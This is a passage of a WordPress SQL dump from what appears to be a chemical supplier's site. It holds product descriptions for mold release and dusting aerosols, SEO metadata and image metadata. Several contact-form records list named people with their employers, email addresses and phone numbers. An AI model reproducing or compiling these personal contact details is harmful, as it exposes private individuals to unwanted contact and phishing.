vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent. NOTE: Material will apply wet and transparent, but will dry to a fine-white coat.</li>\r\n 	<li>Allow solvent to dry completely before molding any parts. This will ensure the most effective coating for durability and cycle life.</li>\r\n</ol>\r\n<h4><strong>Reapplication</strong>:</h4>\r\n<ol>\r\n 	<li>When release becomes hesitant, reapply one coat of MS-122SEL in the same manner as described above.</li>\r\n</ol>\r\n<h4><strong>Fused Coatings Procedure</strong></h4>\r\n<ol>\r\n 	<li>After applying the release agent, heat the surface to 581ºF - 600ºF.</li>\r\n 	<li>Coating transition from a white to translucent will occur. Maintain the temperature of the coated surface for 5 to 10 minutes.</li>\r\n 	<li>If a white residue is left on the metal surface, buff with a soft cloth. When the coating is properly fused, it is extremely durable.</li>\r\n</ol>\r\n<strong>Physical Properties</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Primary Polymer</td>\r\n<td style="text-align: center;" width="206">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White Particle suspension</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Slight</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">1.41 g/mL @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (24594, 2771, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24595, 2771, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24596, 2771, '_yoast_wpseo_primary_product_cat', '16'); 
INSERT INTO `wp_postmeta` VALUES (24597, 2771, '_yoast_wpseo_focuskw_text_input', 'MS-122SEL Low Global Warming Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24598, 2771, '_yoast_wpseo_focuskw', 'MS-122SEL Low Global Warming Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24599, 2771, '_yoast_wpseo_title', 'MS-122SEL Low Global Warming Mold Release Agent | PTFE Release'); 
INSERT INTO `wp_postmeta` VALUES (24600, 2771, '_yoast_wpseo_metadesc', 'MS-122SEL Low Global Warming Mold Release Agent is a high performance, high solvency mold release agent utilizing a PTFE mold release agent.'); 
INSERT INTO `wp_postmeta` VALUES (24601, 2771, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24602, 2771, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24603, 2769, '_yoast_wpseo_linkdex', '93'); 
INSERT INTO `wp_postmeta` VALUES (24604, 2771, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (24605, 2773, '_edit_lock', '1477682812:3'); 
INSERT INTO `wp_postmeta` VALUES (24606, 2773, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (24607, 2774, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24608, 2774, '_seq_num', '66'); 
INSERT INTO `wp_postmeta` VALUES (24609, 2774, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24610, 2774, '_field_1', 'Michael'); 
INSERT INTO `wp_postmeta` VALUES (24611, 2774, '_field_10', 'CORFIN INDUSTRIES LLC'); 
INSERT INTO `wp_postmeta` VALUES (24612, 2774, '_field_2', 'SHIPPING@CORFIN.COM'); 
INSERT INTO `wp_postmeta` VALUES (24613, 2774, '_field_8', '(603) 893-9900'); 
INSERT INTO `wp_postmeta` VALUES (24614, 2774, '_field_3', 'Hi I&#039;m looking for pricing for MS-755M 8 oz. spray bottle.\n\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (24615, 2774, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24616, 2774, '_sub_id', '2774'); 
INSERT INTO `wp_postmeta` VALUES (24617, 2775, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24618, 2775, '_seq_num', '67'); 
INSERT INTO `wp_postmeta` VALUES (24619, 2775, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24620, 2775, '_field_1', 'Kasey Baker'); 
INSERT INTO `wp_postmeta` VALUES (24621, 2775, '_field_10', 'The Spaceship Company'); 
INSERT INTO `wp_postmeta` VALUES (24622, 2775, '_field_2', 'kasey.baker@thespaceshipcompany.com'); 
INSERT INTO `wp_postmeta` VALUES (24623, 2775, '_field_8', '(720) 581-1038'); 
INSERT INTO `wp_postmeta` VALUES (24624, 2775, '_field_3', 'I am a systems engineer at the The Spaceship Company in Mojave, CA.\n\nWe are currently looking for pricing, lead time and technical information related to the Fomblin Z series oils.\n\nOur application is spacecraft and requires super low viscosity at a minimum temperature of -65ºF for a working fluid in a mechanical damper assembly.  \n\nPlease contact me via email to provide pricing and technical data.\n'); 
INSERT INTO `wp_postmeta` VALUES (24625, 2775, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24626, 2775, '_sub_id', '2775'); 
INSERT INTO `wp_postmeta` VALUES (24627, 2776, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24628, 2776, '_seq_num', '68'); 
INSERT INTO `wp_postmeta` VALUES (24629, 2776, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24630, 2776, '_field_1', 'Kasey Baker'); 
INSERT INTO `wp_postmeta` VALUES (24631, 2776, '_field_10', 'The Spaceship Company, Mojave, CA'); 
INSERT INTO `wp_postmeta` VALUES (24632, 2776, '_field_2', 'kasey.baker@thespaceshipcompany.com'); 
INSERT INTO `wp_postmeta` VALUES (24633, 2776, '_field_8', '(720) 581-1038'); 
INSERT INTO `wp_postmeta` VALUES (24634, 2776, '_field_3', 'I am a systems engineer at the The Spaceship Company in Mojave, CA.\n\nWe are currently looking for pricing, lead time and technical information related to the Krytox series oils.\n\nOur application is spacecraft and requires super low viscosity at a minimum temperature of -65ºF for a working fluid in a mechanical damper assembly.  \n\nPlease contact me via email to provide pricing and technical data.\n'); 
INSERT INTO `wp_postmeta` VALUES (24635, 2776, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24636, 2776, '_sub_id', '2776'); 
INSERT INTO `wp_postmeta` VALUES (24637, 452, '_wp_old_slug', '143az'); 
INSERT INTO `wp_postmeta` VALUES (24638, 452, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24639, 452, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24640, 452, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24641, 452, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (24642, 452, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (24643, 452, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24644, 2777, '_wp_attached_file', '2016/10/shutterstock_370106177.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24645, 2777, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4896;s:6:"height";i:3264;s:4:"file";s:34:"2016/10/shutterstock_370106177.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_370106177-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_370106177-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_370106177-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_370106177-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_370106177-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_370106177-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_370106177-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_370106177-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24646, 2773, '_thumbnail_id', '2779'); 
INSERT INTO `wp_postmeta` VALUES (24648, 2773, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (24649, 2773, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24650, 2773, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (24651, 2773, '_yoast_wpseo_focuskw_text_input', 'military spec chemicals'); 
INSERT INTO `wp_postmeta` VALUES (24652, 2773, '_yoast_wpseo_focuskw', 'military spec chemicals'); 
INSERT INTO `wp_postmeta` VALUES (24653, 2773, '_yoast_wpseo_title', 'Miller-Stephenson Military Specification Chemicals'); 
INSERT INTO `wp_postmeta` VALUES (24654, 2773, '_yoast_wpseo_metadesc', 'Miller-Stephenson offers a wide variety of military spec chemicals and lubrication products. These are great for military and government projects.'); 
INSERT INTO `wp_postmeta` VALUES (24655, 2773, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (24656, 2773, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24657, 2773, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (24658, 2779, '_wp_attached_file', '2016/10/shutterstock_296498720.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24659, 2779, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:34:"2016/10/shutterstock_296498720.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_296498720-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_296498720-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_296498720-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_296498720-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_296498720-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_296498720-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_296498720-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_296498720-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24661, 2773, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (24662, 2773, '_yoast_wpseo_linkdex', '88'); 
INSERT INTO `wp_postmeta` VALUES (24664, 2781, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24665, 2781, '_seq_num', '85'); 
INSERT INTO `wp_postmeta` VALUES (24666, 2781, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24667, 2781, '_field_12', 'Frederick Cummings'); 
INSERT INTO `wp_postmeta` VALUES (24668, 2781, '_field_13', 'Polynt Composites USA Inc.'); 
INSERT INTO `wp_postmeta` VALUES (24669, 2781, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24670, 2781, '_field_14', 'fred.cummings@polynt.com'); 
INSERT INTO `wp_postmeta` VALUES (24671, 2781, '_field_15', '(847) 836-3030'); 
INSERT INTO `wp_postmeta` VALUES (24672, 2781, '_field_16', 'Please send me an SDS for Vazo 67.\r\n\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (24673, 2781, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24674, 2781, '_sub_id', '2781'); 
INSERT INTO `wp_postmeta` VALUES (24675, 2782, '_edit_lock', '1480020025:3'); 
INSERT INTO `wp_postmeta` VALUES (24676, 2782, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (24677, 2784, '_wp_attached_file', '2016/10/shutterstock_389699368.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24678, 2784, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4000;s:4:"file";s:34:"2016/10/shutterstock_389699368.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_389699368-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_389699368-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_389699368-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_389699368-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_389699368-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_389699368-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_389699368-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_389699368-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24679, 2784, '_wp_attachment_image_alt', 'Low Global Warming Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24680, 2785, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24681, 2785, '_seq_num', '86'); 
INSERT INTO `wp_postmeta` VALUES (24682, 2785, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24683, 2785, '_field_12', 'Jen Nicolae'); 
INSERT INTO `wp_postmeta` VALUES (24684, 2785, '_field_13', 'Western Area Power Administration'); 
INSERT INTO `wp_postmeta` VALUES (24685, 2785, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24686, 2785, '_field_14', 'nicolae@wapa.gov'); 
INSERT INTO `wp_postmeta` VALUES (24687, 2785, '_field_15', '(307) 232-5205'); 
INSERT INTO `wp_postmeta` VALUES (24688, 2785, '_field_16', 'I am looking for the SDS for:  MS-230 Contact ReNu'); 
INSERT INTO `wp_postmeta` VALUES (24689, 2785, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24690, 2785, '_sub_id', '2785'); 
INSERT INTO `wp_postmeta` VALUES (24691, 2786, '_wp_attached_file', '2016/10/shutterstock_130437422.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24692, 2786, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3080;s:6:"height";i:2051;s:4:"file";s:34:"2016/10/shutterstock_130437422.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_130437422-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_130437422-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_130437422-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_130437422-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_130437422-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_130437422-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_130437422-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_130437422-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24693, 2782, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24694, 2782, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24695, 2782, '_thumbnail_id', '2786'); 
INSERT INTO `wp_postmeta` VALUES (24696, 2782, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24697, 2782, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24698, 2782, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24699, 2782, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24700, 2782, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24701, 2782, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24702, 2782, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24703, 2782, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24704, 2782, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24705, 2782, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24706, 2782, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24707, 2782, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24708, 2782, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24709, 2782, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24710, 2782, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24711, 2782, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24712, 2782, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24713, 2782, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24714, 2782, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24715, 2782, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24716, 2782, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24717, 2782, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24718, 2782, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24719, 2782, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24720, 2782, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24721, 2782, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24722, 2782, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24723, 2782, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24724, 2782, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24725, 2782, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24726, 2782, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24727, 2782, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24728, 2782, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24729, 2782, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24730, 2782, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24731, 2782, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24732, 2782, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24733, 2782, '_ywtm_content_tab_description', '<h1><strong>MS-222L Aero-Duster® Ultra</strong></h1>\r\nMiller-Stephenson’s MS-222L Aero-Duster® Ultra is an aerosol product that is designed for convenient use in many industrial applications. It contains HFO 1234ze propellant that has an ultra-low Global Warming\r\nPotential (GWP) and is a non-ozone depleting chemical. The Aero-Duster® Ultra performs as compressed air that delivers a dry blast to remove microscopic dust in numerous applications in areas of electronic,\r\nphotographic, computer, and other equipment. The Aero-Duster® Ultra is a pure product with no traces of contaminates and oils, which is essential for critical applications.\r\n\r\nAero-Duster® Ultra removes microscopic dust from:\r\n<ul>\r\n 	<li>Semiconductor chips</li>\r\n 	<li>Specimens under electron microscopes</li>\r\n 	<li>Photographic negatives</li>\r\n</ul>\r\nEnergized Electrical Equipment such as:\r\n<ul>\r\n 	<li>Micro miniature assemblies</li>\r\n 	<li>Electromechanical instruments</li>\r\n 	<li>Magnetic tapes &amp; heads</li>\r\n 	<li>Servomechanisms</li>\r\n 	<li>Computer peripherals</li>\r\n</ul>\r\nThe Cobra®Duster extension, MS-226, may be used in conjunction with the Aero-Duster for delivery to elusive trouble spots on various equipment.\r\n<h4><strong>ADVANTAGES</strong></h4>\r\n<ul>\r\n 	<li>Ultra Low Global Warming Potential</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Nonconductive</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>\r\n<h4><strong>PHYSICAL PROPERTIES OF HFO 1234ze</strong></h4>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Molecular Weight</td>\r\n<td width="206">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td>-2°F/-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor pressure (mmHg)</td>\r\n<td width="206">60.8 psia @ 68°F/20°C           159.5 psia @129.9°F/54.4°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td>1.17 @ 70°F/21.1°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td>exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td>0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (24734, 2782, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24735, 2782, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24736, 2782, '_yoast_wpseo_primary_product_cat', '94'); 
INSERT INTO `wp_postmeta` VALUES (24737, 2782, '_yoast_wpseo_focuskw_text_input', 'MS-222L'); 
INSERT INTO `wp_postmeta` VALUES (24738, 2782, '_yoast_wpseo_focuskw', 'MS-222L'); 
INSERT INTO `wp_postmeta` VALUES (24739, 2782, '_yoast_wpseo_title', 'MS-222L Aero-Duster Ultra - Removes Microscopic Dust'); 
INSERT INTO `wp_postmeta` VALUES (24740, 2782, '_yoast_wpseo_metadesc', 'MS-222L, Low global warming variant of the Aero-Duster, used to remove microscopic dust from semiconductor chips and an array of other applications.'); 
INSERT INTO `wp_postmeta` VALUES (24741, 2782, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24742, 2782, '_yoast_wpseo_focuskeywords', '[{"keyword":"Aero-Duster","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (24743, 2782, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (24744, 2788, '_edit_lock', '1477577108:2'); 
INSERT INTO `wp_postmeta` VALUES (24745, 2788, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (24746, 2772, '_wp_attachment_image_alt', 'MS-122SEL Low Global Warming Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (24747, 2771, '_wp_old_slug', 'ms-122sel'); 
INSERT INTO `wp_postmeta` VALUES (24750, 2789, '_wp_attached_file', '2016/10/shutterstock_444780952.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24751, 2789, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4796;s:6:"height";i:3337;s:4:"file";s:34:"2016/10/shutterstock_444780952.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_444780952-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_444780952-800x557.jpg";s:5:"width";i:800;s:6:"height";i:557;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_444780952-768x534.jpg";s:5:"width";i:768;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_444780952-1600x1113.jpg";s:5:"width";i:1600;s:6:"height";i:1113;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_444780952-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_444780952-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_444780952-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_444780952-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"i